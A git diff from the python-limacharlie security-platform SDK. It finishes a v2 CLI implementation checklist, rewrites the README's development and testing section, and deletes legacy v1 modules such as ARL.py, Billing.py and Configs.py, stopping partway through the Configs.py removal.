+- [x] Implement `commands/tag.py` - tag list, add, remove, find, mass-add, mass-remove
+- [x] Implement `commands/endpoint_policy.py` - isolate, rejoin, status, seal, unseal
+- [x] Implement `commands/task.py` - send, request, reliable-send, reliable-list
+- [x] Implement `commands/rule.py` - list, get, create, update, delete, test, replay, validate, export, import
+- [x] Implement `commands/fp.py` - list, get, create, delete
+- [x] Implement `commands/hive.py` - list-types, list, get, set, delete, validate, rename, export, import
+- [x] Implement `commands/output_cmd.py` - list, get, create, delete
+- [x] Implement `commands/artifact.py` - upload, list, get, download, rules
+- [x] Implement `commands/payload.py` - list, upload, download, delete
+- [x] Implement `commands/search.py` - run, validate, estimate, interactive, saved queries
+- [x] Implement `commands/ioc.py` - search, batch-search, hosts, enrich, batch-enrich
+- [x] Implement `commands/event.py` - list, get, children, overview, timeline, types, schema, retention
+- [x] Implement `commands/detection.py` - list, get
+- [x] Implement `commands/extension.py` - list, subscribe, unsubscribe, rekey, schema, request, config, convert-rules
+- [x] Implement `commands/installation_key.py` - list, get, create, delete
+- [x] Implement `commands/ingestion_key.py` - list, create, delete, configure
+- [x] Implement `commands/user.py` - list, invite, remove, permissions
+- [x] Implement `commands/group.py` - list, get, create, delete, member, owner, permissions, org, logs (NEW)
+- [x] Implement `commands/api_key.py` - list, create, delete
+- [x] Implement `commands/billing.py` - status, details, invoice, plans, skus
+- [x] Implement `commands/stream.py` - events, detections, audit, firehose
+- [x] Implement `commands/replay_cmd.py` - run
+- [x] Implement `commands/integrity.py` - list, get, create, delete
+- [x] Implement `commands/exfil.py` - list, create-watch, create-event, delete
+- [x] Implement `commands/logging_cmd.py` - list, get, create, delete
+- [x] Implement `commands/yara.py` - scan, rules list/add/delete, sources list/get/add/delete
+- [x] Implement `commands/sync.py` - pull, push, diff
+- [x] Implement `commands/ai.py` - generate-rule, generate-detection, generate-response, generate-query, generate-selector, generate-playbook, summarize-detection (NEW)
+- [x] Implement `commands/investigation.py` - list, get, create, update, delete, expand (NEW)
+- [x] Implement `commands/usp.py` - validate
+- [x] Implement `commands/secret.py` - list, get, set, delete (NEW)
+- [x] Implement `commands/lookup.py` - list, get, set, query, delete (NEW)
+- [x] Implement `commands/playbook.py` - list, get, set, delete (NEW)
+- [x] Implement `commands/adapter.py` - list, get, set, delete (NEW)
+- [x] Implement `commands/cloud_sensor.py` - list, get, set, delete (NEW)
+- [x] Implement `commands/sop.py` - list, get, set, delete (NEW)
+- [x] Implement `commands/note.py` - list, get, set, delete (NEW)
+- [x] Implement `commands/arl.py` - get
+- [x] Implement `commands/job.py` - list, get, wait, delete
+- [x] Implement `commands/audit.py` - list
+- [x] Implement `commands/spotcheck.py` - run
+- [x] Implement `commands/schema.py` - list, get
+- [x] Implement `commands/help_cmd.py` - help, discover, cheatsheet
+
+### Phase 4: Help & Discovery Content
+- [x] Write help topic: d&r-rules
+- [x] Write help topic: hive
+- [x] Write help topic: lcql
+- [x] Write help topic: sensors
+- [x] Write help topic: outputs
+- [x] Write help topic: extensions
+- [x] Write help topic: sync
+- [x] Write help topic: auth
+- [x] Write help topic: permissions
+- [x] Write help topic: events
+- [x] Write help topic: detections
+- [x] Write help topic: adapters
+- [x] Write help topic: platform-codes
+- [x] Write help topic: ioc-types
+- [x] Write help topic: timestamps
+- [x] Write help topic: bexpr
+- [x] Write help topic: billing
+- [x] Write cheatsheet: common-operations
+- [x] Write cheatsheet: detection-engineering
+- [x] Write cheatsheet: incident-response
+- [x] Write cheatsheet: fleet-management
+- [x] Write cheatsheet: searching
+- [x] Write explain text for every command
+
+### Phase 5: Integration Tests
+- [x] Implement test fixtures in `tests/integration/conftest.py`
+- [x] Implement `test_v2_auth.py`
+- [x] Implement `test_v2_sensors.py`
+- [x] Implement `test_v2_rules.py`
+- [x] Implement `test_v2_hive.py`
+- [x] Implement `test_v2_outputs.py`
+- [x] Implement `test_v2_keys.py` (api_keys, installation_keys, ingestion_keys)
+- [x] Implement `test_v2_org.py` (info, urls, errors, stats)
+- [x] Implement `test_v2_billing.py`
+- [x] Implement `test_artifacts.py`
+- [x] Implement `test_search.py`
+- [x] Implement `test_extensions.py`
+- [x] Implement `test_users.py`
+- [x] Implement `test_sync.py`
+- [x] Implement `test_replay.py`
+- [x] Implement `test_stream.py`
+- [x] Implement `test_ai.py`
+- [x] Implement `test_groups.py`
+- [x] Implement `test_org_management.py`
+- [x] Implement `test_usp.py`
+- [x] Implement `test_integrity.py`
+- [x] Implement `test_exfil.py`
+- [x] Implement `test_logging.py`
+- [x] Implement `test_yara.py`
+- [x] Implement `test_jobs.py`
+- [x] Implement `test_cli_e2e.py`
+
+### Phase 6: Packaging & CI
+- [x] Update `setup.py` / `pyproject.toml` for v2
+- [x] Update entry points to use v2 CLI
+- [x] Update `cloudbuild.yaml` and `cloudbuild_pr.yaml`
+- [x] Update `Dockerfile`
+- [x] Update `requirements.txt` with new dependencies
+- [x] Create `requirements-tests.txt` for test dependencies
+- [x] Verify wheel and sdist builds
+
+### Phase 7: Documentation
+- [x] Update `README.md` with v2 usage
+- [x] Migration guide from v1 to v2
+
+---
+
+## Appendix A: Feature Gap Analysis (API vs Current CLI)
+
+Features in the API gateway that are **NOT** in the current CLI and are **added in v2**:
+
+| Feature | API Endpoint | v2 Command |
+|---------|-------------|------------|
+| AI D&R Rule Generation | `POST /ai/dr` | `limacharlie ai generate-rule` |
+| AI Detection Generation | `POST /ai/detection` | `limacharlie ai generate-detection` |
+| AI Response Generation | `POST /ai/response` | `limacharlie ai generate-response` |
+| AI LCQL Generation | `POST /ai/lcql` | `limacharlie ai generate-query` |
+| AI Sensor Selector | `POST /ai/sensor_selector` | `limacharlie ai generate-selector` |
+| AI Python Playbook | `POST /ai/playbook/python` | `limacharlie ai generate-playbook` |
+| AI Detection Summary | `POST /ai/det_summary` | `limacharlie ai summarize-detection` |
+| Organization Groups | `GET/POST/DELETE /groups/*` | `limacharlie group *` |
+| Investigations | Various | `limacharlie investigation *` |
+| Secrets (shortcut) | Hive `secret` | `limacharlie secret *` |
+| Lookups (shortcut) | Hive `lookup` | `limacharlie lookup *` |
+| Playbooks (shortcut) | Hive `playbook` | `limacharlie playbook *` |
+| External Adapters (shortcut) | Hive `external_adapter` | `limacharlie adapter *` |
+| SOPs (shortcut) | Hive `sop` | `limacharlie sop *` |
+| Org Notes (shortcut) | Hive `note` | `limacharlie note *` |
+| Cloud Sensors (shortcut) | Hive `cloud_sensor` | `limacharlie cloud-sensor *` |
+| Extension Config Management | Various | `limacharlie extension config *` |
+| Extension Rule Conversion | `POST /extension/convert_rules` | `limacharlie extension convert-rules` |
+| User Role Setting | Via permissions | `limacharlie user permissions set-role` |
+| Lookup Query | `GET /lookup/{name}/query` | `limacharlie lookup query` |
+| IOC Enrichment | `GET /object_information` | `limacharlie ioc enrich` |
+| Sensor Version Mgmt | `POST /sensor_version` | `limacharlie sensor set-version` |
+| Sensor Export | `GET /sensor_list_export` | `limacharlie sensor export` |
+| Memory Dump | Via sensor tasking | `limacharlie sensor dump` |
+| Host Sweep | Via replicant | `limacharlie sensor sweep` |
+| Job Tracking | Various | `limacharlie job *` |
+| ARL Resolution | `GET /arl` | `limacharlie arl get` |
+| Interactive LCQL | N/A (CLI-only) | `limacharlie search interactive` |
+| Log Collection Rules | Via replicant | `limacharlie logging *` |
+| YARA Scanning | Via replicant | `limacharlie yara *` |
+| Template Testing | `POST /test_template` | (available via hive validate) |
+| Transform Testing | `POST /test_transform` | (available via hive validate) |
+
+## Appendix B: Hive Type Reference
+
+| Hive Name | Purpose | Common Use |
+|-----------|---------|------------|
+| `dr-general` | Custom D&R rules | Rule management |
+| `dr-managed` | LimaCharlie-managed D&R rules | Managed rule overrides |
+| `dr-service` | Service-level D&R rules | Service rules |
+| `fp` | False positive rules | FP management |
+| `cloud_sensor` | Cloud sensor configurations | Cloud log ingestion |
+| `extension_config` | Extension configurations | Extension settings |
+| `yara` | YARA scanning rules | Malware detection |
+| `secret` | Encrypted secrets | API keys, tokens |
+| `lookup` | Lookup tables | Allowlists, blocklists |
+| `query` | Saved LCQL queries | Reusable queries |
+| `playbook` | Automation playbooks | Response automation |
+| `ai_agent` | AI agent configurations | AI agent settings |
+| `external_adapter` | External adapter configs | Third-party integrations |
+| `sop` | Standard Operating Procedures | Runbooks |
+| `note` | Organization notes | Documentation |
+
+## Appendix C: Output Module Reference
+
+| Module | Data Types | Description |
+|--------|-----------|-------------|
+| `syslog` | event, detect, audit | Forward to syslog server |
+| `s3` | event, detect, audit, artifact | AWS S3 bucket |
+| `gcs` | event, detect, audit, artifact | Google Cloud Storage |
+| `pubsub` | event, detect | Google Pub/Sub |
+| `bigquery` | event, detect | Google BigQuery |
+| `scp` | event, detect, audit | SCP file transfer |
+| `sftp` | event, detect, audit | SFTP file transfer |
+| `slack` | detect | Slack notifications |
+| `webhook` | event, detect, audit | HTTP webhook |
+| `webhook_bulk` | event, detect, audit | Bulk HTTP webhook |
+| `smtp` | detect | Email notifications |
+| `humio` | event, detect | Humio/LogScale |
+| `kafka` | event, detect, audit | Apache Kafka |
+| `azure_storage_blob` | event, detect, audit | Azure Blob Storage |
+| `azure_event_hub` | event, detect | Azure Event Hub |
+| `elastic` | event, detect | Elasticsearch |
+| `tines` | detect | Tines SOAR |
+| `torq` | detect | Torq SOAR |
+| `datadog` | event, detect | DataDog |
+| `opensearch` | event, detect | OpenSearch |
+| `websocket` | event, detect | WebSocket stream |
+
+## Appendix D: Rate Limiting Reference
+
+| Category | Limit | Window |
+|----------|-------|--------|
+| General API calls | 100 | 10 minutes |
+| Built-in/SDK calls | 1,000 | 10 minutes |
+| Bulk operations | 10,000 | 10 minutes |
+| AI generation | 10 | 1 minute |
+
+When rate limited, the CLI should:
+1. Log a warning with retry-after time
+2. If `--retry` flag is set, automatically retry with exponential backoff
+3. Return exit code 5 for rate limit errors (distinct from other errors)
diff --git a/README.md b/README.md
index 832c8576..0923357e 100644
--- a/README.md
+++ b/README.md
@@ -528,8 +528,7 @@ limacharlie session profile delete --id PROFILE_ID
 ### Sync (Infrastructure as Code)
 
 Sync uses the `ext-infrastructure` extension to pull and push org configuration.
-D&R rules and FP rules are synced through their respective hives rather than the
-legacy `--rules` / `--fps` flags.
+D&R rules and FP rules are synced through their respective hives.
 
 ```bash
 # Pull/push everything
@@ -880,8 +879,7 @@ artifact_list = artifacts.list()
 ### Configuration Sync
 
 Uses the `ext-infrastructure` extension. D&R rules and FP rules are synced
-via their hives (`dr-general`, `dr-managed`, `dr-service`, `fp`) rather
-than the legacy `sync_rules` / `sync_fps` flags.
+via their hives (`dr-general`, `dr-managed`, `dr-service`, `fp`).
 
 ```python
 from limacharlie.sdk.configs import Configs
@@ -932,42 +930,48 @@ configs.push_from_file("org.yaml", sync_outputs=True,
 | `AISessions` | `limacharlie.sdk.ai_sessions` | Interactive AI session lifecycle and WebSocket chat |
 | `Billing` | `limacharlie.sdk.billing` | Billing and usage details |
 
-## Legacy v1 SDK
+## Development
 
-The v1 SDK classes (`Manager`, `Sensor`, `Firehose`, `Sync`, etc.) remain available under `limacharlie.*` for backward compatibility. They are not actively developed but will continue to work.
+### Setup
 
-```python
-# v1 imports still work
-import limacharlie
-man = limacharlie.Manager(oid="...", secret_api_key="...")
-sensors = man.sensors()
-```
-
-### Migration from v1
-
-| v1 Pattern | v2 Pattern |
-|---|---|
-| `limacharlie.Manager(oid=..., secret_api_key=...)` | `Client(oid=..., api_key=...)` + `Organization(client)` |
-| `man.sensors()` | `org.list_sensors()` |
-| `man.rules()` | `org.get_rules()` or `DRRules(org).list()` |
-| `man.add_rule(name, detect, respond)` | `org.add_rule(name, detect, respond)` |
-| `man.del_rule(name)` | `org.delete_rule(name)` |
-| `man.outputs()` | `org.get_outputs()` |
-| `limacharlie.Sensor(man, sid)` | `Sensor(org, sid)` |
-| `sensor.tag(tag, ttl)` | `sensor.add_tag(tag, ttl=ttl)` |
-| `sensor.task(command)` | `sensor.task(command)` |
-| `limacharlie.Firehose(...)` | `Spout(org, data_type=...)` |
-| `limacharlie.Configs(man).fetch()` | `Configs(org).fetch()` |
-| `limacharlie login` | `limacharlie auth login` |
-| `limacharlie use` | `limacharlie auth use-env` |
-| `limacharlie whoami` | `limacharlie auth whoami` |
-| `limacharlie dr --list` | `limacharlie rule list` |
-| `limacharlie configs fetch` | `limacharlie sync pull` |
-| `limacharlie configs push` | `limacharlie sync push` |
-
-Key changes in v2:
-- `Manager` replaced by `Client` (auth/HTTP) + domain-specific SDK classes
-- CLI uses `noun verb` pattern instead of flat commands with flags
-- `gevent` dependency removed; streaming uses `requests` directly
-- All commands support `--output json|yaml|csv|table|jsonl` and `--filter`
-- Built-in help: `--ai-help`, `limacharlie help <topic>`, `limacharlie discover`
+```bash
+git clone https://github.com/refractionPOINT/python-limacharlie.git
+cd python-limacharlie
+python3 -m venv .venv
+source .venv/bin/activate
+pip install -e ".[dev]"
+```
+
+The editable install (`-e`) means changes to the source code take effect immediately without reinstalling.
+
+### Running the CLI
+
+After the editable install, the `limacharlie` command is available in your venv:
+
+```bash
+limacharlie --version
+limacharlie --help
+limacharlie sensor list --help
+```
+
+### Running Tests
+
+Unit tests run without any credentials or network access:
+
+```bash
+# All unit tests
+pytest tests/unit/ -v
+
+# Single test file
+pytest tests/unit/test_client.py -v
+
+# Single test case
+pytest tests/unit/test_client.py::TestClientInit::test_creates_with_explicit_creds -v
+```
+
+Integration tests require a real LimaCharlie organization:
+- [ ] TODO: specify requirements for the org to run integation tests against, if any
+
+```bash
+pytest tests/integration/ --oid YOUR_ORG_ID --key YOUR_API_KEY -v
+```
diff --git a/limacharlie/ARL.py b/limacharlie/ARL.py
deleted file mode 100644
index b4f551df..00000000
--- a/limacharlie/ARL.py
+++ /dev/null
@@ -1,32 +0,0 @@
-from arl import AuthenticatedResourceLocator as arl
-
-class ARL( object ):
-    def __init__( self, resource ):
-        self.resource = resource
-
-    def get_arl(self, resource):
-
-        with arl( resource ) as res:
-            for fileName, fileData in res:            
-                print("File name: %s\nFile contents:\n%s\n\n" % (fileName, fileData))
-
-
-def main( sourceArgs = None ):
-    import argparse
-
-    parser = argparse.ArgumentParser( prog = 'limacharlie get-arl' )
-    parser.add_argument( '-a', '--arl',
-                         type = str,
-                         required = True,
-                         dest = 'arl',
-                         help = 'the ARL to query')
-    
-    args = parser.parse_args( sourceArgs )
-
-    arls = ARL( resource = args.arl )
-
-    print( "Querying ARL at %s" % ( args.arl ) )
-
-    _ = arls.get_arl(
-        args.arl
-    )
diff --git a/limacharlie/Billing.py b/limacharlie/Billing.py
deleted file mode 100644
index d695c9fd..00000000
--- a/limacharlie/Billing.py
+++ /dev/null
@@ -1,35 +0,0 @@
-from limacharlie import Manager
-import json
-
-from .utils import POST
-from .utils import DELETE
-from .utils import GET
-from .utils import PUT
-from .utils import PATCH
-
-class Billing( object ):
-    def __init__( self, manager ):
-        self._manager = manager
-
-    def getOrgStatus( self ):
-        return self._manager._apiCall( 'orgs/%s/status' % ( self._manager._oid, ), GET, altRoot = 'https://billing.limacharlie.io/' )
-
-    def getOrgDetails( self ):
-        return self._manager._apiCall( 'orgs/%s/details' % ( self._manager._oid, ), GET, altRoot = 'https://billing.limacharlie.io/' )
-
-    def getOrgInvoiceURL( self, year, month, format = None ):
-        year = str( int( year ) )
-        month = str( int( month ) ).zfill( 2 )
-        params = {}
-        if format:
-            params[ 'format' ] = format
-        return self._manager._apiCall( 'orgs/%s/invoice_url/%s/%s' % ( self._manager._oid, year, month ), GET, altRoot = 'https://billing.limacharlie.io/', queryParams = params )
-
-    def getAvailablePlans( self ):
-        return self._manager._apiCall( 'user/self/plans', GET, altRoot = 'https://billing.limacharlie.io/' )
-
-    def getUserAuthRequirements( self ):
-        return self._manager._apiCall( 'user/self/auth', GET, altRoot = 'https://billing.limacharlie.io/' )
-
-    def getSkuDefinitions( self ):
-        return self._manager._apiCall( 'orgs/%s/sku-definitions' % ( self._manager._oid, ), GET, altRoot = 'https://billing.limacharlie.io/' )
diff --git a/limacharlie/Configs.py b/limacharlie/Configs.py
deleted file mode 100644
index 8955a4c9..00000000
--- a/limacharlie/Configs.py
+++ /dev/null
@@ -1,1136 +0,0 @@
-from .Manager import Manager
-from .Replicants import Integrity
-from .Replicants import Logging
-from .Replicants import Exfil
-from .utils import _isStringCompat
-from .Extensions import Extension
-
-# Detect if this is Python 2 or 3
-import sys
-_IS_PYTHON_2 = False
-if sys.version_info[ 0 ] < 3:
-    _IS_PYTHON_2 = True
-
-import uuid
-import os
-import sys
-import yaml
-import json
-import glob
-
-class LcConfigException( Exception ):
-    pass
-
-class Configs( object ):
-    '''Configs object to fetch and apply configs to and from organizations.'''
-
-    def __init__( self, oid = None, env = None, manager = None, isDontUseInfraService = False, isUseExtension = False ):
-        '''Create a Configs object.
-
-        Args:
-            oid (str): organization ID to operate on.
-            env (str): environment name to use.
-            manager (limacharlie.Manager): Manager object to use instead.
-            isDontUseInfraService (bool): if True, do not use the LimaCharlie infrastructure-service to apply configs.
-            isUseExtension (bool): if True, use the infrastructure extension in the cloud instead of the service.
-        '''
-
-        self._confVersion = 3
-        if manager is None:
-            self._man = Manager( oid = oid, environment = env )
-        else:
-            self._man = manager
-
-        self._isDontUseInfraService = isDontUseInfraService
-        self._isUseExtension = isUseExtension
-
-        self._configRoots = {
-            'rules',
-            'outputs',
-            'extensions',
-            'resources',
-            'integrity',
-            'fps',
-            'exfil',
-            'artifact',
-            'org-value',
-            'hives',
-            'installation_keys',
-            'yara',
-        }
-
-    def _coreRuleContent( self, rule ):
-        return { k : v for k, v in rule.items() if k in ( 'name', 'detect', 'respond', 'namespace' ) }
-
-    def _coreFPContent( self, rule ):
-        return { k : v for k, v in rule.items() if k in ( 'name', 'data' ) }
-
-    def _coreOutputContent( self, output ):
-        return { k : v for k, v in output.items() if k not in ( 'name', 'oid', 'by' ) }
-
-    def _coreIntegrityContent( self, rule ):
-        rule = { k : v for k, v in rule.items() if k not in ( 'by', 'updated' ) }
-        rule[ 'tags' ] = rule[ 'filters' ][ 'tags' ]
-        rule[ 'platforms' ] = rule[ 'filters' ][ 'platforms' ]
-        del( rule[ 'filters' ] )
-        return rule
-
-    def _coreLoggingContent( self, rule ):
-        rule = { k : v for k, v in rule.items() if k not in ( 'by', 'updated' ) }
-        rule[ 'tags' ] = rule[ 'filters' ][ 'tags' ]
-        rule[ 'platforms' ] = rule[ 'filters' ][ 'platforms' ]
-        del( rule[ 'filters' ] )
-        return rule
-
-    def _coreExfilContent( self, rule ):
-        rule = { k : v for k, v in rule.items() if k not in ( 'by', 'updated' ) }
-        rule[ 'tags' ] = rule[ 'filters' ][ 'tags' ]
-        rule[ 'platforms' ] = rule[ 'filters' ][ 'platforms' ]
-        del( rule[ 'filters' ] )
-        return rule
-
-    def _wrapExfilContent( self, rule ):
-        platforms = rule.get( 'platforms', None )
-        tags = rule.get( 'tags', None )
-        if platforms is None and tags is None:
-            return rule
-        rule[ 'filters' ] = {
-            'platforms' : platforms if platforms is not None else [],
-            'tags' : tags if tags is not None else [],
-        }
-        rule.pop( 'platforms', None )
-        rule.pop( 'tags', None )
-        return rule
-
-    def _isJsonEqual( self, a, b ):
-        if json.dumps( a, sort_keys = True ) != json.dumps( b, sort_keys = True ):
-            return False
-
-        return True
-
-    def _ignoreLockErrors( self, e, isIgnoreInaccessible ):
-        if not isIgnoreInaccessible:
-            return False
-        if 'lock' in str( e ).lower():
-            return True
-        return False
-
-    def _getSupportedOrgConfigs( self ):
-        return (
-            "vt",
-            "otx",
-            "domain",
-            "shodan",
-            "pagerduty",
-            "twilio",
-        )
-
-    def _getAllOrgConfigValues( self ):
-        currentConfigs = {}
-        for confName in self._getSupportedOrgConfigs():
-            val = self._man.getOrgConfig( confName )
-            currentConfigs[ confName ] = val
-        return currentConfigs
-
-    def fetch( self, toConfigFile, isRules = False, isFPs = False, isOutputs = False, isIntegrity = False, isArtifact = False, isExfil = False, isResources = False, isExtensions = False, isOrgConfigs = False, isHives={}, isInstallationKeys = False, isYara = False ):
-        '''Retrieves the effective configuration in the cloud to a local config file.
-
-        Args:
-            toConfigFile (str, dict): the path to the local config file or dict where to store config.
-        '''
-        if not isinstance( toConfigFile, dict ):
-            toConfigFile = os.path.abspath( toConfigFile )
-            asConf = { 'version' : self._confVersion }
-        else:
-            asConf = toConfigFile
-
-        # If we can use the service, shortcut all this logic
-        # and use the authoritative service in the cloud.
-        if not self._isDontUseInfraService:
-            try:
-                if self._isUseExtension:
-                    data = self._man.extensionRequest( 'ext-infrastructure', 'fetch', {
-                        'options' : {
-                            'sync_dr' : isRules,
-                            'sync_outputs' : isOutputs,
-                            'sync_resources' : isResources,
-                            'sync_extensions' : isExtensions,
-                            'sync_integrity' : isIntegrity,
-                            'sync_fp' : isFPs,
-                            'sync_exfil' : isExfil,
-                            'sync_artifacts' : isArtifact,
-                            'sync_org_values' : isOrgConfigs,
-                            'sync_hives' : isHives, # must be map of hive names you want to fetch {"cloud_sensor":true, "fp":true, "dr-service":true, "dr-general": true}
-                            'sync_installation_keys' : isInstallationKeys,
-                            'sync_yara' : isYara,
-                        },
-                    }, isImpersonate = True )
-                    asConf = data[ 'data' ][ 'org' ]
-                else:
-                    data = self._man.serviceRequest( 'infrastructure-service', {
-                        'action' : 'fetch',
-                        'sync_dr' : isRules,
-                        'sync_outputs' : isOutputs,
-                        'sync_resources' : isResources,
-                        'sync_extensions' : isExtensions,
-                        'sync_integrity' : isIntegrity,
-                        'sync_fp' : isFPs,
-                        'sync_exfil' : isExfil,
-                        'sync_artifacts' : isArtifact,
-                        'sync_org_values' : isOrgConfigs,
-                        'sync_hives' : isHives, # must be map of hive names you want to fetch {"cloud_sensor":true, "fp":true, "dr-service":true, "dr-general": true}
-                        'sync_installation_keys' : isInstallationKeys,
-                        'sync_yara' : isYara,
-                    }, isImpersonate = True )
-
-                    for k, v in yaml.safe_load( data[ 'org' ] ).items():
-                        asConf[ k ] = v
-
-                # Apply a few of the translation layers.
-                exfilRules = asConf.get( 'exfil', None )
-                if exfilRules is not None:
-                    for ruleName, rule in exfilRules.get( 'watch', {} ).items():
-                        if '' == rule[ 'operator' ]:
-                            # This is a [secret] rule, let's not mirror it since
-                            # it is handled by a Service.
-                            continue
-                        exfilRules[ 'watch' ][ ruleName ] = self._coreExfilContent( rule )
-                    for ruleName, rule in exfilRules.get( 'list', {} ).items():
-                        exfilRules[ 'list' ][ ruleName ] = self._coreExfilContent( rule )
-                    asConf[ 'exfil' ] = exfilRules
-
-                if not isinstance( toConfigFile, dict ):
-                    with open( toConfigFile, 'wb' ) as f:
-                        f.write( yaml.safe_dump( asConf, default_flow_style = False, version = (1,1) ).encode() )
-            except:
-                print( "An error occurred while fetching changes from %s via the infrastructure-service, you may use the --use-local-logic flag if you want to proceed without the service" % ( self._man._oid, ) )
-                raise
-            return
-
-        if isOrgConfigs:
-            configs = self._getAllOrgConfigValues()
-
-            asConf[ 'org-value' ] = configs
-        if isRules:
-            rules = {}
-            # Check which namespaces we have access to.
-            availableNamespaces = []
-            if self._man.testAuth( permissions = [ 'dr.list' ] ):
-                availableNamespaces.append( 'general' )
-            if self._man.testAuth( permissions = [ 'dr.list.managed' ] ):
-                availableNamespaces.append( 'managed' )
-            if self._man.testAuth( permissions = [ 'dr.list.replicant' ] ):
-                availableNamespaces.append( 'replicant' )
-
-            # Fetch the rules from all the namespaces we have access to.
-            for namespace in availableNamespaces:
-                rules.update( self._man.rules( namespace = namespace ) )
-
-            for ruleName, rule in list( rules.items() ):
-                # Special rules from services are ignored.
-                if ruleName.startswith( '__' ):
-                    del( rules[ ruleName ] )
-                    continue
-                rules[ ruleName ] = self._coreRuleContent( rule )
-            asConf[ 'rules' ] = rules
-        if isFPs:
-            rules = {}
-            fps = self._man.fps()
-
-            for ruleName, rule in list( fps.items() ):
-                rules[ ruleName ] = self._coreFPContent( rule )
-            asConf[ 'fps' ] = rules
-        if isOutputs:
-            outputs = self._man.outputs()
-            for outputName, output in list( outputs.items() ):
-                if output.get( 'is_delete_on_failure', 'false' ) == 'true':
-                    # Delete on failure is associated with temporary
-                    # outputs so we won't consider them.
-                    outputs.pop( outputName )
-                    continue
-                outputs[ outputName ] = self._coreOutputContent( output )
-            asConf[ 'outputs' ] = outputs
-        if isIntegrity:
-            integrityRules = Integrity( self._man ).getRules()
-            for ruleName, rule in integrityRules.items():
-                integrityRules[ ruleName ] = self._coreIntegrityContent( rule )
-            asConf[ 'integrity' ] = integrityRules
-        if isArtifact:
-            artifactRules = Logging( self._man ).getRules()
-            for ruleName, rule in artifactRules.items():
-                artifactRules[ ruleName ] = self._coreLoggingContent( rule )
-            asConf[ 'artifact' ] = artifactRules
-        if isExfil:
-            exfilRules = Exfil( self._man ).getRules()
-            for ruleName, rule in exfilRules[ 'watch' ].items():
-                if '' == rule[ 'operator' ]:
-                    # This is a [secret] rule, let's not mirror it since
-                    # it is handled by a Service.
-                    continue
-                exfilRules[ 'watch' ][ ruleName ] = self._coreExfilContent( rule )
-            for ruleName, rule in exfilRules[ 'list' ].items():
-                exfilRules[ 'list' ][ ruleName ] = self._coreExfilContent( rule )
-            asConf[ 'exfil' ] = exfilRules
-        if isResources:
-            asConf[ 'resources' ] = self._man.getSubscriptions()
-            # Translate the replicant entry to service.
-            for resType, resources in asConf[ 'resources' ].items():
-                if resType != 'replicant':
-                    continue
-                asConf[ 'resources' ][ 'service' ] = asConf[ 'resources' ][ 'replicant' ]
-                asConf[ 'resources' ].pop( 'replicant' )
-                break
-        if isExtensions:
-            asConf[ 'extensions' ] = list( Extension( self._man ).list().keys() )
-        if not isinstance( toConfigFile, dict ):
-            with open( toConfigFile, 'wb' ) as f:
-                f.write( yaml.safe_dump( asConf, default_flow_style = False, version = (1,1) ).encode() )
-
-    def push( self, fromConfigFile, isForce = False, isDryRun = False, isIgnoreInaccessible = False, isRules = False, isFPs = False, isOutputs = False, isIntegrity = False, isArtifact = False, isExfil = False, isResources = False, isExtensions = False, isOrgConfigs = False, isHives={}, isInstallationKeys = False, isYara = False, isVerbose = False ):
-        '''Apply the configuratiion in a local config file to the effective configuration in the cloud.
-
-        Args:
-            fromConfigFile (str/dict): the path to the config file or dict of a config file content.
-            isForce (boolean): if True will remove configurations in the cloud that are not present in the local file.
-            isDryRun (boolean): if True will only simulate the effect of a push.
-            isIgnoreInaccessible (boolean): if True, ignore inaccessible resources (locked) even when isForce is True.
-            isRules (boolean): if True, push D&R rules.
-            isFPs (boolean): if True, push False Positive rules.
-            isOutputs (boolean): if True, push Outputs.
-            isIntegrity (boolean): if True, push Integrity rules.
-            isArtifact (boolean): if True, push Artifact rules.
-            isExfil (boolean): if True, push Exfil rules.
-            isResources (boolean): if True, push Resource subscriptions.
-            isExtensions (boolean): if True, push Extension subscriptions.
-            isOrgConfigs (boolean): if True, push Org Configs.
-            isHives (dict{"hive_name": true}): only one hive value is requried for sync push to process passed config data, if empty or null no push will occur
-            isInstallationKeys (boolean): if True, push Installation Keys.
-            isYara (boolean): if True, push Yara rules and sources.
-
-        Returns:
-            a generator of changes as tuple (changeType, dataType, dataName).
-        '''
-        if isinstance( fromConfigFile, dict ):
-            # The config is already in memory.
-            asConf = fromConfigFile
-        else:
-            # Load the config file from disk.
-            fromConfigFile = os.path.abspath( fromConfigFile )
-
-            # Config files are always evaluated relative to the current one.
-            contextPath = os.path.dirname( fromConfigFile )
-            currentPath = os.getcwd()
-            os.chdir( contextPath )
-
-            # This function also does the bulk of the validation.
-            asConf, allIncluded = self._loadEffectiveConfig( fromConfigFile )
-            if isVerbose:
-                for include in allIncluded:
-                    yield ( '*', 'include', include )
-
-            # Revert the previous CWD.
-            os.chdir( currentPath )
-
-        # If we can use the service, shortcut all this logic
-        # and use the authoritative service in the cloud.
-        if not self._isDontUseInfraService:
-            try:
-                # Apply a few of the translation layers.
-                exfilRules = asConf.get( 'exfil', None )
-                if exfilRules is not None:
-                    for ruleName, rule in exfilRules.get( 'watch', {} ).items():
-                        if '' == rule[ 'operator' ]:
-                            # This is a [secret] rule, let's not mirror it since
-                            # it is handled by a Service.
-                            continue
-                        exfilRules[ 'watch' ][ ruleName ] = self._wrapExfilContent( rule )
-                    for ruleName, rule in exfilRules.get( 'list', {} ).items():
-                        exfilRules[ 'list' ][ ruleName ] = self._wrapExfilContent( rule )
-                    asConf[ 'exfil' ] = exfilRules
-
-                finalConfig = yaml.safe_dump( asConf, version = (1,1) )
-
-                if self._isUseExtension:
-                    data = self._man.extensionRequest( 'ext-infrastructure', 'push', {
-                        'config' : finalConfig,
-                        'options' : {
-                            'is_dry_run' : isDryRun,
-                            'is_force' : isForce,
-                            'ignore_inaccessible' : isIgnoreInaccessible,
-                            'sync_dr' : isRules,
-                            'sync_outputs' : isOutputs,
-                            'sync_resources' : isResources,
-                            'sync_extensions' : isExtensions,
-                            'sync_integrity' : isIntegrity,
-                            'sync_fp' : isFPs,
-                            'sync_exfil' : isExfil,
-                            'sync_artifacts' : isArtifact,
-                            'sync_org_values' : isOrgConfigs,
-                            'sync_hives' : isHives,
-                            'sync_installation_keys' : isInstallationKeys,
-                            'sync_yara' : isYara,
-                        },
-                    }, isImpersonate = True )
-                    data = data[ 'data' ]
-                else:
-                    data = self._man.serviceRequest( 'infrastructure-service', {
-                        'is_dry_run' : isDryRun,
-                        'action' : 'push',
-                        'is_force' : isForce,
-                        'ignore_inaccessible' : isIgnoreInaccessible,
-                        'config' : finalConfig,
-                        'sync_dr' : isRules,
-                        'sync_outputs' : isOutputs,
-                        'sync_resources' : isResources,
-                        'sync_extensions' : isExtensions,
-                        'sync_integrity' : isIntegrity,
-                        'sync_fp' : isFPs,
-                        'sync_exfil' : isExfil,
-                        'sync_artifacts' : isArtifact,
